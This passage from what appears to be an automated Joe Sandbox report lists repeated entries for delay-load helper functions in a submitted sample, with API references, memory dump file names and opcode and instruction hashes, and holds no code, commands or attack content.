                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 10f5d08cbe0feffe0ed9385334f2dc0d8ca2b88eb8c49b48b985425e551b4f89
                                        • Instruction ID: b1a22a7a204322a34bcf02ac41b1fb77bdd4a8454051ba5ad32e0c5524479e66
                                        • Opcode Fuzzy Hash: 10f5d08cbe0feffe0ed9385334f2dc0d8ca2b88eb8c49b48b985425e551b4f89
                                        • Instruction Fuzzy Hash: A8B0129127C0016C360472153E02E37010CC0C5B51330462EF804C1581D4C14F730431
                                        Function 002949B7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 546b6e215957a247843d6c4d04a2df0df31c57b75130b5f7036a2b76335bc638
                                        • Instruction ID: 9a0512b1f1841ffe318b176dfa7de766e8e2bfc1c77224abf586f914161f9331
                                        • Opcode Fuzzy Hash: 546b6e215957a247843d6c4d04a2df0df31c57b75130b5f7036a2b76335bc638
                                        • Instruction Fuzzy Hash: 47B012812BD0016C3A0472143D02D37010DC0C6B51330861EF808C15C1D4C04D720431
                                        Function 0029498F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ffc00b4469fbb5e1aa4374d5746809f2c13128937eb7d1484cf32338a9af3447
                                        • Instruction ID: de5ef3b3e3b666bb543ff00546243a3380aa5dc2f28607707cedeba8f4319504
                                        • Opcode Fuzzy Hash: ffc00b4469fbb5e1aa4374d5746809f2c13128937eb7d1484cf32338a9af3447
                                        • Instruction Fuzzy Hash: D6B0129227C0016C360472143D02E37010CC0C6B51330862EF804C1581D4C04E720431
                                        Function 00294985 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: c0ee3ddc9db8f3443d35e213b7ced1b27cc52ed64995ff1d67461580c5a292c0
                                        • Instruction ID: 78052c5bf4e8f77704c0e6a49162cc708c7ed21f76d40f1d9890991e058c57d7
                                        • Opcode Fuzzy Hash: c0ee3ddc9db8f3443d35e213b7ced1b27cc52ed64995ff1d67461580c5a292c0
                                        • Instruction Fuzzy Hash: 5FB0128127C0016C364872643D02D37010CC0C5B513308A1EF405C1681D4C04D760431
                                        Function 00294999 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9f68d349de5b2ea9677804ddb80ebd0d28f548b2bd0bf1db1f55447399e3ec1a
                                        • Instruction ID: aa80478e8112b470736cc0e2120a20f06a3743fb96d99f5ea08399578e745c0d
                                        • Opcode Fuzzy Hash: 9f68d349de5b2ea9677804ddb80ebd0d28f548b2bd0bf1db1f55447399e3ec1a
                                        • Instruction Fuzzy Hash: FAB0129127C1016C374472153D02E37010CC0C5B51330472EF404C1581D4C04EB20431
                                        Function 002949C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: d78e02f0e22e0545c0314c3594b5223d272c8bec8814ac33b0fdf1b01c14b956
                                        • Instruction ID: 930be10ca2763813048e368f20d5f4476614f26c04d3b98e10754be20287050f
                                        • Opcode Fuzzy Hash: d78e02f0e22e0545c0314c3594b5223d272c8bec8814ac33b0fdf1b01c14b956
                                        • Instruction Fuzzy Hash: 78B0129127D1016C3B4473153D02D37010DC0C5B51330471EF408C1581D4C08DB20431
                                        Function 002949D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 42c8f1f133486789da1cb18526bc7b9c733d934468c4d01b91af9baca5d50d05
                                        • Instruction ID: f40f824524deb4a098748cbc57be0a8a5eea9cec14d6fe3c973ee530d214b24e
                                        • Opcode Fuzzy Hash: 42c8f1f133486789da1cb18526bc7b9c733d934468c4d01b91af9baca5d50d05
                                        • Instruction Fuzzy Hash: 71B0128127D0016C3A0472143D02D37014EC4C5B51330461EF408C1581D4C04D720431
                                        Function 00294A07 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 71cf6c7584e33da02226cbfb4cc0166f14121c906bc6da98ba282483f3f36d5b
                                        • Instruction ID: 6cba7a358e65a97e109f5d4eefa3ef5e0f3e77df63bece3252f5a411c228a84b
                                        • Opcode Fuzzy Hash: 71cf6c7584e33da02226cbfb4cc0166f14121c906bc6da98ba282483f3f36d5b
                                        • Instruction Fuzzy Hash: 89B0128127C0016D360472143D03D37010CC0C6B513308A1EF804C5581D4C04D720431
                                        Function 00294B62 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 434a4aaba839316d86ab4c9bfecfab80066f2833490fd19f90ed1603544b5637
                                        • Instruction ID: 831969153c4b4d0926c66abdd6440118523ac784988585146646cfde49227682
                                        • Opcode Fuzzy Hash: 434a4aaba839316d86ab4c9bfecfab80066f2833490fd19f90ed1603544b5637
                                        • Instruction Fuzzy Hash: 1CB0128127D0026C350471095E03E37010CC4C1B15330932EF500C1181D4804C730631
                                        Function 00294B58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 6b8e599a780efac5387b4654aaff1a1677c67f5a205faa018663991b64dea109
                                        • Instruction ID: 9d1928fa8b033081d5606d4ed190f79c19ef2cfdec52d8014691eb4326b919fc
                                        • Opcode Fuzzy Hash: 6b8e599a780efac5387b4654aaff1a1677c67f5a205faa018663991b64dea109
                                        • Instruction Fuzzy Hash: 2FB0128127D1026C3604710A5D03E37010CC4C1B15330532EF400C11C1D4804CB60631
                                        Function 00294B8A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 4804329e21ee367818308041c780ac36537e097811e32bc769bbb7b1156a30ad
                                        • Instruction ID: 6bf9025c591cd00cde54453a42f3506d897e21a2ace76ae0e453b528e0b34e87
                                        • Opcode Fuzzy Hash: 4804329e21ee367818308041c780ac36537e097811e32bc769bbb7b1156a30ad
                                        • Instruction Fuzzy Hash: DEB0128127D112AC350471091D13E37010CC4C1B15330922EFC00C1281D4805C720631
                                        Function 00294976 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ba51bf44d974ea46f30930becbe0e0594a3a7471ffa7ecded64ae5553de4d5b4
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: ba51bf44d974ea46f30930becbe0e0594a3a7471ffa7ecded64ae5553de4d5b4
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 002949B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: fb6e887399a3af38256422228720a8f95b955ca602d149965aa155c7bb32ea89
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: fb6e887399a3af38256422228720a8f95b955ca602d149965aa155c7bb32ea89
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 002949EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 95fa9c8404b692e05ee789fc5b05043fc82cfc20519c5b1628b06d426ed5352c
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: 95fa9c8404b692e05ee789fc5b05043fc82cfc20519c5b1628b06d426ed5352c
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 002949E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 125a0af44fe3f218a514acfe21d30877f82a7c57a1ef1d05ab8c540986b6d660
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: 125a0af44fe3f218a514acfe21d30877f82a7c57a1ef1d05ab8c540986b6d660
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 002949F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: b57a7068d83dafe8d0e56d32595f63a9b1bdd2dff2a7e00137e2fd255992f69e
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: b57a7068d83dafe8d0e56d32595f63a9b1bdd2dff2a7e00137e2fd255992f69e
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 002949D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
